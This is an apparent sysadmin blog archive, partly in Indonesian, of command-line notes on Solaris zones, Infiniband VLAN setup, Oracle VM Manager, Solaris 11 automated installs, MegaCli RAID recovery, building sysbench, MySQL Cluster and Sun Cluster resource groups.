Delicious

Archives

Categories

Archive for '*NIX' Category





« »

install package dari DVD installer solaris 10:
=======================================
– SUNWs8brandr
– SUNWs8brandu

# lofiadm -a /source/solaris10-u13_sparc.iso
# mount -F hsfs /dev/lofi/1 /mnt
# cd /mnt/Solaris_10/Product/
# pkgadd -d . SUNWs8brandr
# pkgadd -d . SUNWs8brandu

 

install patch solaris8 container / template
=======================================
- download patch untuk solaris8 sparc 11702874 (p11702874_800_SOLARIS64.zip)
- extract

# unzip p11702874_800_SOLARIS64.zip
# gunzip s8containers-bundle-solaris10-sparc.tar.gz
# tar xf s8containers-bundle-solaris10-sparc.tar
# cd  s8containers-bundle/1.0.1/Product/
# pkgadd -d . SUNWs8brandk

 

setup / Install zone

# zonecfg -z solaris8
solaris8: No such zone configured
Use 'create' to begin configuring a new zone.
zonecfg:solaris8> create -t SUNWsolaris8            <--- -t=template
zonecfg:solaris8> set zonepath=/zones/solaris8
zonecfg:solaris8> set autoboot=true
zonecfg:solaris8> add net
zonecfg:solaris8:net> set address=X.X.X.X 
zonecfg:solaris8:net> set physical=e1000g1
zonecfg:solaris8:net> end
zonecfg:solaris8> verify
zonecfg:solaris8> commit
zonecfg:solaris8> exit
 
# zoneadm -z solaris8 install -u -a /path/hasil/extract/patch/tadi/s8-s8zone.flar
 
# zoneadm list -cv
  ID NAME             STATUS     PATH                           BRAND    IP
   0 global           running    /                              native   shared
   - solaris8         installed  /zones/solaris8                solaris8 shared
 
# zoneadm -z solaris8 boot

 

configure zone via console

#zlogin -C -e % solaris8


Trunking Infiniband

  ozzie / 01/09/2014

trunking Infiniband exalogic

Set port mode trunk on catalyst

catalystXX > enable
catalystXX #configure terminal 
Enter configuration commands, one per line.  End with CNTL/Z.
catalystXX # interface Gi0/2
catalystXX (config-if)#switchport mode trunk

 

configure VLAN @ infiniband switch

# showvlan 
   Connector/LAG  VLN   PKEY
   -------------  ---   ------
   0A-ETH-1        0    0xffff
 
# createvlan 0A-ETH-1 -VLAN 193 -PKEY default
# createvlan 0A-ETH-1 -VLAN 195 -PKEY default
# showvlan 
   Connector/LAG  VLN   PKEY
   -------------  ---   ------
   0A-ETH-1        195  0xffff
   0A-ETH-1        193  0xffff
   0A-ETH-1        0    0xffff

 

setup vnic @ compute-node

# dladm show-vnic
LINK                OVER         SPEED  MACADDRESS        MACADDRTYPE       VID
net0e0              net7         10000  2:8:20:48:ca:ea   random            0
net0e1              net8         10000  2:8:20:79:38:53   random            0
 
# dladm create-vnic -l net7 -v 193 vnic0
# dladm create-vnic -l net8 -v 193 vnic1
# dladm create-vnic -l net7 -v 195 vnic2
# dladm create-vnic -l net8 -v 195 vnic3
 
# dladm show-vnic
LINK                OVER         SPEED  MACADDRESS        MACADDRTYPE       VID
net0e0             net7         10000  2:8:20:44:aa:9f   	random            0
net0e1             net8         10000  2:8:20:58:8b:7d   random            0
vnic0               net7         10000  2:8:20:f0:60:62   	random            193
vnic1               net8         10000  2:8:20:f2:c6:e    	random            193
vnic2               net7         10000  2:8:20:5e:f6:63   	random            195
vnic3               net8         10000  2:8:20:f9:fb:d2   	random            195

 

assign vnic for solaris container @ compute-node

# zonecfg -z solariszone1
zonecfg:solariszone1> add net
zonecfg:solariszone1:net> set physical=vnic0
zonecfg:solariszone1:net> end
zonecfg:solariszone1> add net
zonecfg:solariszone1:net> set physical=vnic1
zonecfg:solariszone1:net> end
zonecfg:solariszone1> verify
zonecfg:solariszone1> commit
zonecfg:solariszone1> exit
 
# zoneadm -z solariszone1 reboot
 
# zonecfg -z solariszone2
zonecfg:solariszone2> add net
zonecfg:solariszone2:net> set physical=vnic2
zonecfg:solariszone2:net> end
zonecfg:solariszone2> add net
zonecfg:solariszone2:net> set physical=vnic3
zonecfg:solariszone2:net> end
zonecfg:solariszone2> verify
zonecfg:solariszone2> commit
zonecfg:solariszone2> exit
 
# zoneadm -z solariszone2 reboot

 

verify vnic compute-node

# dladm  show-vnic
LINK                OVER         SPEED  MACADDRESS        MACADDRTYPE       VID
net0e0              net7         10000  2:8:20:48:ca:ea   random            0
net0e1              net8         10000  2:8:20:79:38:53   random            0
vnic0               net7         	 10000  2:8:20:f2:8e:41   random            193
solariszone1/vnic0 net7     10000  2:8:20:f2:8e:41   random            193
vnic1               net8         	 10000  2:8:20:be:ce:6c   random            193
solariszone1/vnic1 net8     10000  2:8:20:be:ce:6c   random            193
vnic2               net7         	 10000  2:8:20:3c:88:32   random           195
solariszone2/vnic2 net7     10000  2:8:20:3c:88:32   random            195
vnic3               net8         	 10000  2:8:20:69:fb:dc   random            195
solariszone2/vnic3 net8      10000  2:8:20:69:fb:dc   random            195


Problem:
ketika switch ke node lain:

# clrg switch -n kambing1 kambing-rg
clrg:  (C748634) Resource group kambing-rg failed to start on chosen node and might fail over to other node(s)
 
# metaset 
# metaset -s kandang-data
metaset: kambing1: setname "kandang-data": no such set
 
# metaset -s kandang-apps
metaset: kambing1: setname "kandang-apps": no such set

shutdown kambing1 (init 0), tinggalkan pada ok promt;

 

- remove kambing1 diskset dari kambing2:

# metaset -s kandang-apps -d -f -h kambing1
# metaset -s kandang-data -d -f -h kambing1

*process ini cukup lama.. biarkan timeout

 
reboot kambing1 dan re-add pada kambing2:

# metaset -s kandang-data -a -h kambing1
# metaset -s kandang-apps  -a -h kambing1

check metaset pada kambing1.. switch resource group antar node;

enjooyyy <:-p




login to Oracle VM Manager:

[root@kandangMonyet ~]# cd /u01/app/oracle/ovm-manager-3/bin
[root@kandangMonyet bin]# ./secureOvmmTcpGenKeyStore.sh 
Generate OVMM TCP over SSH key store by following steps:
Enter keystore password:  
Re-enter new password: 
What is your first and last name?
  [Unknown]:  ozzienich
What is the name of your organizational unit?
  [Unknown]:  kandang
What is the name of your organization?
  [Unknown]:  kebonbinatang.org
What is the name of your City or Locality?
  [Unknown]:  Jakarta
What is the name of your State or Province?
  [Unknown]:  DKI
What is the two-letter country code for this unit?
  [Unknown]:  ID
Is CN=ozzienich, OU=kandang, O=kebonbinatang.org, L=Jakarta, ST=DKI, C=ID correct?
  [no]:  yes
Enter key password for <ovmm>
	(RETURN if same as keystore password):
 
[root@kandangMonyet bin]# ./secureOvmmTcp.sh
Enabling OVMM TCP over SSH service
Please enter the OVM manager user name: admin
Please enter the OVM manager user password: 
Please enter the password for TCPS key store : 
The job of enabling OVMM TCPS service is committed, please restart OVMM to take effect.

restart service OVM manager:

[root@kandangMonyet bin]# /sbin/service ovmm stop
[root@kandangMonyet bin]# /sbin/service ovmm start

register to Enterprise Manager OpsCenter:
create discovery profile for OVM, :



Solaris 11 AI

  ozzie / 27/02/2014

download ISO Solaris 11 AI (>>>>)

# installadm create-service -s /export/home/ozzie/sol-11_1-ai-sparc.iso
Warning: Service svc:/network/dns/multicast:default is not online.
   Installation services will not be advertised via multicast DNS.
 
Creating service from: /export/home/ozzie/sol-11_1-ai-sparc.iso
OK to use subdir of /export/auto_install to store image? [y/N]: Y
Setting up the image ...
 
Creating sparc service: solaris11_1-sparc
 
Image path: /export/auto_install/solaris11_1-sparc
 
Service discovery fallback mechanism set up
Creating SPARC configuration file
Refreshing install services
Warning: mDNS registry of service solaris11_1-sparc could not be verified.
 
Creating default-sparc alias
 
Service discovery fallback mechanism set up
Creating SPARC configuration file
No local DHCP configuration found. This service is the default
alias for all SPARC clients. If not already in place, the following should
be added to the DHCP configuration:
Boot file: http://ip-installserver:5555/cgi-bin/wanboot-cgi
 
Refreshing install services
Warning: mDNS registry of service default-sparc could not be verified.

generate manifest profile:

#sysconfig create-profile -o /var/tmp/client_sc.xml


# installadm create-profile -n default-sparc -f /var/tmp/client_sc.xml -p sclient
# installadm list -p
Service/Profile Name  Criteria
--------------------  --------
default-sparc
   sclient            None

 

# installadm export -n default-sparc -m orig_default -o /var/tmp/OZ.xml
# cat /var/tmp/OZ.xml
<!DOCTYPE auto_install SYSTEM "file:///usr/share/install/ai.dtd.1">
<auto_install>
  <ai_instance name="OZ">
    <target>
      <logical>
        <zpool name="rpool" is_root="true">
          <!--
            Subsequent <filesystem> entries instruct an installer to create
            following ZFS datasets:
 
                <root_pool>/export         (mounted on /export)
                <root_pool>/export/home    (mounted on /export/home)
 
            Those datasets are part of standard environment and should be
            always created.
 
            In rare cases, if there is a need to deploy an installed system
            without these datasets, either comment out or remove <filesystem>
            entries. In such scenario, it has to be also assured that
            in case of non-interactive post-install configuration, creation
            of initial user account is disabled in related system
            configuration profile. Otherwise the installed system would fail
            to boot.
          -->
          <filesystem name="export" mountpoint="/export"/>
          <filesystem name="export/home"/>
          <be name="solaris"/>
        </zpool>
      </logical>
    </target>
    <software type="IPS">
      <destination>
        
      </destination>
      <source>
        <publisher name="solaris">
          <origin name="http://10.10.2.12:9000"/>
        </publisher>
      </source>
      <!--
        The version specified by the "entire" package below, is
        installed from the specified IPS repository.  If another build
        is required, the build number should be appended to the
        'entire' package in the following form:
 
            <name>pkg:/entire@0.5.11-0.build#</name>
      -->
      <software_data action="install">
        <name>pkg:/entire@0.5.11-0.175.1</name>
        <name>pkg:/group/system/solaris-large-server</name>
      </software_data>
    </software>
  </ai_instance>
</auto_install>
 
# installadm create-manifest -n default-sparc -f /var/tmp/OZ.xml   -m OZ -d
# installadm list -n default-sparc  -m
Service/Manifest Name  Status   Criteria
---------------------  ------   --------
default-sparc
   client2             Default  None
   orig_default        Inactive None

 

create local repository

# mount -F hsfs /export/repoSolaris11/sol-11-repo-full.iso /mnt 
# rsync -aP /mnt/repo/ /export/repoSolaris11 
# pkgrepo -s /export/repoSolaris11 refresh 
# svccfg -s application/pkg/server setprop pkg/inst_root=/export/repoSolaris11 
# svccfg -s application/pkg/server setprop pkg/readonly=true 
# svccfg -s application/pkg/server setprop pkg/port=9000 
# svcadm refresh application/pkg/server 
# svcadm enable application/pkg/server

 

booting <:-p

SPARC Enterprise T5220, No Keyboard
Copyright (c) 1998, 2013, Oracle and/or its affiliates. All rights reserved.
OpenBoot 4.33.6.d, 16256 MB memory available, Serial #XXXXXXXX
Ethernet address 0:21:28:3f:7a:c4, Host ID: XXXXXX
 
 
 
{0} ok ssetenv network-boot-arguments  host-ip=client-IP,router-ip=router-ip,subnet-mask=mask-value,hostname=client-name,file=wanbootCGI-URL
{0} ok boot net - install


# /opt/MegaRaid/LSI/MegaCli  -LDInfo -Lall -aALL
Adapter 0 -- Virtual Drive Information:
Virtual Drive: 0 (Target Id: 0)
Name                :
RAID Level          : Primary-1, Secondary-0, RAID Level Qualifier-0
Size                : 278.464 GB
Sector Size         : 512
Mirror Data         : 278.464 GB
State               : Degraded
Strip Size          : 64 KB
Number Of Drives    : 2
Span Depth          : 1
Default Cache Policy: WriteBack, ReadAheadNone, Cached, No Write Cache if Bad BBU
Current Cache Policy: WriteBack, ReadAheadNone, Cached, No Write Cache if Bad BBU
Default Access Policy: Read/Write
Current Access Policy: Read/Write
Disk Cache Policy   : Disk's Default
Encryption Type     : None
Is VD Cached: Yes
Cache Cade Type : Read Only
Exit Code: 0x00

 

# /opt/MegaRaid/LSI/MegaCli  -PDList -aALL
Adapter #0
Enclosure Device ID: 252
Slot Number: 0
Enclosure position: N/A
Device Id: 9
WWN: 5000CCA01600163F
Sequence Number: 6
Media Error Count: 0
Other Error Count: 0
Predictive Failure Count: 0
Last Predictive Failure Event Seq Number: 0
PD Type: SAS
 
Raw Size: 279.396 GB [0x22ecb25c Sectors]
Non Coerced Size: 278.896 GB [0x22dcb25c Sectors]
Coerced Size: 278.464 GB [0x22cee000 Sectors]
Sector Size:  0
Firmware state: Unconfigured(bad)
Device Firmware Level: A31A
Shield Counter: 0
Successful diagnostics completion on :  N/A
SAS Address(0): 0x5000cca01600163d
SAS Address(1): 0x0
Connected Port Number: 1(path0) 
Inquiry Data: HITACHI H109030SESUN300GA31A1335C01GXN          
FDE Capable: Not Capable
FDE Enable: Disable
Secured: Unsecured
Locked: Unlocked
Needs EKM Attention: No
Foreign State: Foreign 
Foreign Secure: Drive is not secured by a foreign lock key
Device Speed: 6.0Gb/s 
Link Speed: 6.0Gb/s 
Media Type: Hard Disk Device
Drive:  Not Certified
Drive Temperature :25C (77.00 F)
PI Eligibility:  No 
Drive is formatted for PI information:  No
PI: No PI
Port-0 :
Port status: Active
Port's Linkspeed: 6.0Gb/s 
Port-1 :
Port status: Active
Port's Linkspeed: Unknown 
Drive has flagged a S.M.A.R.T alert : No
 
Enclosure Device ID: 252
Slot Number: 1
Drive's position: DiskGroup: 0, Span: 0, Arm: 1
Enclosure position: N/A
Device Id: 8
WWN: 5000CCA016002EBB
Sequence Number: 2
Media Error Count: 0
Other Error Count: 0
Predictive Failure Count: 0
Last Predictive Failure Event Seq Number: 0
PD Type: SAS
 
Raw Size: 279.396 GB [0x22ecb25c Sectors]
Non Coerced Size: 278.896 GB [0x22dcb25c Sectors]
Coerced Size: 278.464 GB [0x22cee000 Sectors]
Sector Size:  0
Firmware state: Online, Spun Up
Commissioned Spare : No
Emergency Spare : No
Device Firmware Level: A31A
Shield Counter: 0
Successful diagnostics completion on :  N/A
SAS Address(0): 0x5000cca016002eb9
SAS Address(1): 0x0
Connected Port Number: 0(path0) 
Inquiry Data: HITACHI H109030SESUN300GA31A1335C033GN          
FDE Capable: Not Capable
FDE Enable: Disable
Secured: Unsecured
Locked: Unlocked
Needs EKM Attention: No
Foreign State: None 
Device Speed: 6.0Gb/s 
Link Speed: 6.0Gb/s 
Media Type: Hard Disk Device
Drive:  Not Certified
Drive Temperature :26C (78.80 F)
PI Eligibility:  No 
Drive is formatted for PI information:  No
PI: No PI
Port-0 :
Port status: Active
Port's Linkspeed: 6.0Gb/s 
Port-1 :
Port status: Active
Port's Linkspeed: Unknown 
Drive has flagged a S.M.A.R.T alert : No
Exit Code: 0x00

 

# /opt/MegaRaid/LSI/MegaCli -PDMakeGood -physDrv [252:0] -a0                
Adapter: 0: EnclId-252 SlotId-0 state changed to Unconfigured-Good.
 
Exit Code: 0x00

 

# /opt/MegaRaid/LSI/MegaCli  -PDList -aALL                           
Adapter #0
 
Enclosure Device ID: 252
Slot Number: 0
Enclosure position: N/A
Device Id: 9
WWN: 5000CCA01600163F
Sequence Number: 7
Media Error Count: 0
Other Error Count: 0
Predictive Failure Count: 0
Last Predictive Failure Event Seq Number: 0
PD Type: SAS
 
Raw Size: 279.396 GB [0x22ecb25c Sectors]
Non Coerced Size: 278.896 GB [0x22dcb25c Sectors]
Coerced Size: 278.464 GB [0x22cee000 Sectors]
Sector Size:  0
Firmware state: Unconfigured(good), Spun Up
Device Firmware Level: A31A
Shield Counter: 0
Successful diagnostics completion on :  N/A
SAS Address(0): 0x5000cca01600163d
SAS Address(1): 0x0
Connected Port Number: 1(path0) 
Inquiry Data: HITACHI H109030SESUN300GA31A1335C01GXN          
FDE Capable: Not Capable
FDE Enable: Disable
Secured: Unsecured
Locked: Unlocked
Needs EKM Attention: No
Foreign State: Foreign 
Foreign Secure: Drive is not secured by a foreign lock key
Device Speed: 6.0Gb/s 
Link Speed: 6.0Gb/s 
Media Type: Hard Disk Device
Drive:  Not Certified
Drive Temperature :26C (78.80 F)
PI Eligibility:  No 
Drive is formatted for PI information:  No
PI: No PI
Port-0 :
Port status: Active
Port's Linkspeed: 6.0Gb/s 
Port-1 :
Port status: Active
Port's Linkspeed: Unknown 
Drive has flagged a S.M.A.R.T alert : No
 
Enclosure Device ID: 252
Slot Number: 1
Drive's position: DiskGroup: 0, Span: 0, Arm: 1
Enclosure position: N/A
Device Id: 8
WWN: 5000CCA016002EBB
Sequence Number: 2
Media Error Count: 0
Other Error Count: 0
Predictive Failure Count: 0
Last Predictive Failure Event Seq Number: 0
PD Type: SAS
 
Raw Size: 279.396 GB [0x22ecb25c Sectors]
Non Coerced Size: 278.896 GB [0x22dcb25c Sectors]
Coerced Size: 278.464 GB [0x22cee000 Sectors]
Sector Size:  0
Firmware state: Online, Spun Up
Commissioned Spare : No
Emergency Spare : No
Device Firmware Level: A31A
Shield Counter: 0
Successful diagnostics completion on :  N/A
SAS Address(0): 0x5000cca016002eb9
SAS Address(1): 0x0
Connected Port Number: 0(path0) 
Inquiry Data: HITACHI H109030SESUN300GA31A1335C033GN          
FDE Capable: Not Capable
FDE Enable: Disable
Secured: Unsecured
Locked: Unlocked
Needs EKM Attention: No
Foreign State: None 
Device Speed: 6.0Gb/s 
Link Speed: 6.0Gb/s 
Media Type: Hard Disk Device
Drive:  Not Certified
Drive Temperature :26C (78.80 F)
PI Eligibility:  No 
Drive is formatted for PI information:  No
PI: No PI
Port-0 :
Port status: Active
Port's Linkspeed: 6.0Gb/s 
Port-1 :
Port status: Active
Port's Linkspeed: Unknown 
Drive has flagged a S.M.A.R.T alert : No
Exit Code: 0x00

 

# /opt/MegaRaid/LSI/MegaCli -PDReplaceMissing -physDrv [252:0] -a0

 

# /opt/MegaRaid/LSI/MegaCli -PDOnline -physDrv [252:0] -a0
 
EnclId-252 SlotId-0 state changed to OnLine.
 
Exit Code: 0x00

 

# /opt/MegaRaid/LSI/MegaCli  -PDList -aALL
 
Adapter #0
 
Enclosure Device ID: 252
Slot Number: 0
Drive's position: DiskGroup: 0, Span: 0, Arm: 0
Enclosure position: N/A
Device Id: 9
WWN: 5000CCA01600163F
Sequence Number: 9
Media Error Count: 0
Other Error Count: 0
Predictive Failure Count: 0
Last Predictive Failure Event Seq Number: 0
PD Type: SAS
 
Raw Size: 279.396 GB [0x22ecb25c Sectors]
Non Coerced Size: 278.896 GB [0x22dcb25c Sectors]
Coerced Size: 278.464 GB [0x22cee000 Sectors]
Sector Size:  0
Firmware state: Online, Spun Up
Commissioned Spare : No
Emergency Spare : No
Device Firmware Level: A31A
Shield Counter: 0
Successful diagnostics completion on :  N/A
SAS Address(0): 0x5000cca01600163d
SAS Address(1): 0x0
Connected Port Number: 1(path0) 
Inquiry Data: HITACHI H109030SESUN300GA31A1335C01GXN          
FDE Capable: Not Capable
FDE Enable: Disable
Secured: Unsecured
Locked: Unlocked
Needs EKM Attention: No
Foreign State: None 
Device Speed: 6.0Gb/s 
Link Speed: 6.0Gb/s 
Media Type: Hard Disk Device
Drive:  Not Certified
Drive Temperature :27C (80.60 F)
PI Eligibility:  No 
Drive is formatted for PI information:  No
PI: No PI
Port-0 :
Port status: Active
Port's Linkspeed: 6.0Gb/s 
Port-1 :
Port status: Active
Port's Linkspeed: Unknown 
Drive has flagged a S.M.A.R.T alert : No
 
 
 
Enclosure Device ID: 252
Slot Number: 1
Drive's position: DiskGroup: 0, Span: 0, Arm: 1
Enclosure position: N/A
Device Id: 8
WWN: 5000CCA016002EBB
Sequence Number: 2
Media Error Count: 0
Other Error Count: 0
Predictive Failure Count: 0
Last Predictive Failure Event Seq Number: 0
PD Type: SAS
 
Raw Size: 279.396 GB [0x22ecb25c Sectors]
Non Coerced Size: 278.896 GB [0x22dcb25c Sectors]
Coerced Size: 278.464 GB [0x22cee000 Sectors]
Sector Size:  0
Firmware state: Online, Spun Up
Commissioned Spare : No
Emergency Spare : No
Device Firmware Level: A31A
Shield Counter: 0
Successful diagnostics completion on :  N/A
SAS Address(0): 0x5000cca016002eb9
SAS Address(1): 0x0
Connected Port Number: 0(path0) 
Inquiry Data: HITACHI H109030SESUN300GA31A1335C033GN          
FDE Capable: Not Capable
FDE Enable: Disable
Secured: Unsecured
Locked: Unlocked
Needs EKM Attention: No
Foreign State: None 
Device Speed: 6.0Gb/s 
Link Speed: 6.0Gb/s 
Media Type: Hard Disk Device
Drive:  Not Certified
Drive Temperature :25C (77.00 F)
PI Eligibility:  No 
Drive is formatted for PI information:  No
PI: No PI
Port-0 :
Port status: Active
Port's Linkspeed: 6.0Gb/s 
Port-1 :
Port status: Active
Port's Linkspeed: Unknown 
Drive has flagged a S.M.A.R.T alert : No


Compiling sysbench @ Solaris-10 SPARC

  ozzie / 05/10/2013

sedikit dokumentasi dari kebanyakan yg gagal install SYSBENCH di Solaris khususnya pada architecture SPARC :D

dengan menu dasar:

 
1. make sure solaris studio sudah siap

# export PATH=$PATH:/opt/solarisstudio/bin

 
2. extract, build & install m4

# cd m4-1.4.17/
# ./configure --prefix=/opt/app
checking for a BSD-compatible install... build-aux/install-sh -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... build-aux/install-sh -c -d
..
..
# make
# make install

 
3. update path binary executable

# export PATH=$PATH:/opt/app/bin

 
4. extract, build & install autoconf

# cd autoconf-2.69/
# ./configure --prefix=/opt/app
checking for a BSD-compatible install... build-aux/install-sh -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... build-aux/install-sh -c -d
..
..
# make
# make install

 
5. extract, build & install automake

# cd automake-1.14
# ./configure --prefix=/opt/app
checking whether make supports nested variables... yes
checking build system type... sparc-sun-solaris2.10
checking host system type... sparc-sun-solaris2.10
checking for a BSD-compatible install... lib/install-sh -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... lib/install-sh -c -d
..
..
# make
# make install

 
6. extract, build & install sysbench
edit file configure.ac

# cd sysbench-0.4.12
# vi configure.ac



edit menjadi AC_PROG_RANLIB

# Checks for programs.
AC_PROG_CC
AC_PROG_LIBTOOL



Menjadi

# Checks for programs.
AC_PROG_CC
AC_PROG_RANLIB


 

# ./configure  --prefix=/opt/sysbench CFLAGS=-m64
checking build system type... sparc-sun-solaris2.10
checking host system type... sparc-sun-solaris2.10
checking target system type... sparc-sun-solaris2.10
checking for a BSD-compatible install... config/install-sh -c
checking whether build environment is sane... yes
..
..
# make 
# make install

 
mari mem-Benchmark OLTP MySQL Enterprise. <:-p <:-p
bagaimana hasilnya?? :>



MySQL Cluster

  ozzie / 09/07/2013

MySQL Cluster @ Solaris 10.
node1 [10.0.5.41]: nDB, Sql, Management
node2 [10.0.5.42]: nDB, Sql
node3 [10.0.5.43]: nDB, Sql


berhubung cuman develop, struktur direcrory config & datadir nyah ditaruh di /apps

# ls /apps
config
ndb_data
mysql_data

# cat /apps/config/config.ini 
[TCP DEFAULT]
 
[NDB_MGMD DEFAULT]
Datadir=/apps/ndb_data/
 
[NDB_MGMD]
NodeId=1
Hostname=10.0.5.41
 
[NDBD DEFAULT]
NoOfReplicas=2
Datadir=/apps/ndb_data/
 
[NDBD]
Hostname=10.0.5.41
 
[NDBD]
Hostname=10.0.5.42
 
[NDBD]
Hostname=10.0.5.43
 
[MYSQLD]
[MYSQLD]
[MYSQLD]

# cat /apps/config/my.cnf 
[MYSQLD]
ndbcluster
ndb-connectstring=10.0.5.41
datadir=/apps/mysql_data
socket=/tmp/mysql.sock
user=mysql
 
[MYSQLD_SAFE]
log-error=/apps/mysqld.log
pid-file=/apps/mysqld.pid
 
[MYSQL_CLUSTER]
ndb-connectstring=10.0.5.41

Execute @ node1: # /opt/mysql/mysql/bin/ndb_mgmd -f /apps/config/config.ini –configdir=/apps/config/ –initial

# /opt/mysql/mysql/bin/ndb_mgmd -f /apps/config/config.ini  --configdir=/apps/config/
MySQL Cluster Management Server mysql-5.5.30 ndb-7.2.12
bash-3.2# ndb_mgm
-- NDB Cluster -- Management Client --
ndb_mgm> show
Connected to Management Server at: localhost:1186
Cluster Configuration
---------------------
[ndbd(NDB)]     3 node(s)
id=2 (not connected, accepting connect from 10.0.5.41)
id=3 (not connected, accepting connect from 10.0.5.42)
id=4 (not connected, accepting connect from 10.0.5.43)
 
[ndb_mgmd(MGM)] 1 node(s)
id=1    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12)
 
[mysqld(API)]   3 node(s)
id=5 (not connected, accepting connect from any host)
id=6 (not connected, accepting connect from any host)
id=7 (not connected, accepting connect from any host)

exec @ node1: # /opt/mysql/mysql/bin/ndbmtd –defaults-file=/apps/config/my.cnf

# /opt/mysql/mysql/bin/ndbmtd --defaults-file=/apps/config/my.cnf 
2013-07-09 23:58:44 [ndbd] INFO     -- Angel connected to '10.0.5.41:1186'
2013-07-09 23:58:44 [ndbd] INFO     -- Angel allocated nodeid: 2
 
# ndb_mgm -e show        
Connected to Management Server at: localhost:1186
Cluster Configuration
---------------------
[ndbd(NDB)]     3 node(s)
id=2    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12, starting, Nodegroup: 0)
id=3 (not connected, accepting connect from 10.0.5.42)
id=4 (not connected, accepting connect from 10.0.5.43)
 
[ndb_mgmd(MGM)] 1 node(s)
id=1    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12)
 
[mysqld(API)]   3 node(s)
id=5 (not connected, accepting connect from any host)
id=6 (not connected, accepting connect from any host)
id=7 (not connected, accepting connect from any host)

execute @ node2 & node3: # /opt/mysql/mysql/bin/ndbmtd –defaults-file=/apps/config/my.cnf

#  /opt/mysql/mysql/bin/ndbmtd --defaults-file=/apps/config/my.cnf 
2013-07-10 00:01:50 [ndbd] INFO     -- Angel connected to '10.0.5.41:1186'
2013-07-10 00:01:50 [ndbd] INFO     -- Angel allocated nodeid: 3

cek pada cluster management:

2# ndb_mgm
-- NDB Cluster -- Management Client --
ndb_mgm> show
Connected to Management Server at: localhost:1186
Cluster Configuration
---------------------
[ndbd(NDB)]     3 node(s)
id=2    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 0, Master)
id=3    @10.0.5.42  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 1)
id=4    @10.0.5.43  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 2)
 
[ndb_mgmd(MGM)] 1 node(s)
id=1    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12)
 
[mysqld(API)]   3 node(s)
id=5 (not connected, accepting connect from any host)
id=6 (not connected, accepting connect from any host)
id=7 (not connected, accepting connect from any host)
indb_mgm>

Execute pada semua Node:

# /opt/mysql/mysql/scripts/mysql_install_db --defaults-file=/apps/config/my.cnf \
 --user=mysql --datadir=/apps/mysql_data --basedir=/opt/mysql/mysql
 
# /opt/mysql/mysql/bin/mysqld_safe --defaults-extra-file=/apps/config/my.cnf &

# ndb_mgm -e show
Connected to Management Server at: localhost:1186
Cluster Configuration
---------------------
[ndbd(NDB)]     3 node(s)
id=2    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 0, Master)
id=3    @10.0.5.42  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 1)
id=4    @10.0.5.43  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 2)
 
[ndb_mgmd(MGM)] 1 node(s)
id=1    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12)
 
[mysqld(API)]   3 node(s)
id=5    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12)
id=6    @10.0.5.42  (mysql-5.5.30 ndb-7.2.12)
id=7    @10.0.5.43  (mysql-5.5.30 ndb-7.2.12)

# mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 3
Server version: 5.5.30-ndb-7.2.12-cluster-commercial-advanced MySQL Cluster Server - Advanced Edition (Commercial)
 
Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
 
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
mysql>

tadaaa.. <:-p <:-p
tinggal configure privileges & create database dengan engine ndbcluster



Removing a Node From a Resource Group
how to ngebuang node (monyet3) dari resource group aktif..

# clq show d1   
=== Quorum Devices ===                         
 
Quorum Device Name:                             d1
  Enabled:                                         yes
  Votes:                                           2
  Global Name:                                     /dev/did/rdsk/d1s2
  Type:                                            shared_disk
  Access Mode:                                     scsi3
  Hosts (enabled):                                 monyet3, monyet1, monyet2
 
=== Cluster Resource Groups ===
 
Group Name       Node Name       Suspended      State
----------       ---------       ---------      -----
MySQL-RG         monyet1         No             Offline
                 monyet2         No             Online
                 monyet3         No             Offline
 
 
# clrg status
=== Cluster Resources ===
 
Resource Name       Node Name      State        Status Message
-------------       ---------      -----        --------------
MySQL-RS            monyet1        Offline      Offline
                    monyet2        Online       Online - Service is online.
                    monyet3        Offline      Offline
 
MySQL-LH            monyet1        Offline      Offline - LogicalHostname offline.
                    monyet2        Online       Online - LogicalHostname online.
                    monyet3        Offline      Offline
 
MySQL-HAS           monyet1        Offline      Offline
                    monyet2        Online       Online
                    monyet3        Offline      Offline
 
 
#  scrgadm -pv -g MySQL-RG                   
Res Group name:                                    MySQL-RG
  (MySQL-RG) Res Group RG_description:             <NULL>
  (MySQL-RG) Res Group mode:                       Failover
  (MySQL-RG) Res Group management state:           Managed
  (MySQL-RG) Res Group RG_project_name:            default
  (MySQL-RG) Res Group RG_SLM_type:                manual
  (MySQL-RG) Res Group RG_affinities:              <NULL>
  (MySQL-RG) Res Group Auto_start_on_new_cluster:  True
  (MySQL-RG) Res Group Failback:                   False
  (MySQL-RG) Res Group Nodelist:                   monyet1 monyet2 monyet3
  (MySQL-RG) Res Group Maximum_primaries:          1
  (MySQL-RG) Res Group Desired_primaries:          1
  (MySQL-RG) Res Group RG_dependencies:            <NULL>
  (MySQL-RG) Res Group network dependencies:       True
  (MySQL-RG) Res Group Global_resources_used:      <All>
  (MySQL-RG) Res Group Pingpong_interval:          3600
  (MySQL-RG) Res Group Pathprefix:                 <NULL>
  (MySQL-RG) Res Group system:                     False
  (MySQL-RG) Res Group Suspend_automatic_recovery: False
 
#  scrgadm -pv -g MySQL-RG | grep -i nodelist
  (MySQL-RG) Res Group Nodelist:                   monyet1 monyet2 monyet3
 
# scrgadm -c -g MySQL-RG -h monyet1,monyet2
#  scrgadm -pv -g MySQL-RG | grep -i nodelist
  (MySQL-RG) Res Group Nodelist:                   monyet1 monyet2
 
# scrgadm -pvv -g MySQL-RG | grep -i netiflist
    (MySQL-RG:MySQL-LH) Res property name:         NetIfList
      (MySQL-RG:MySQL-LH:NetIfList) Res property class: extension
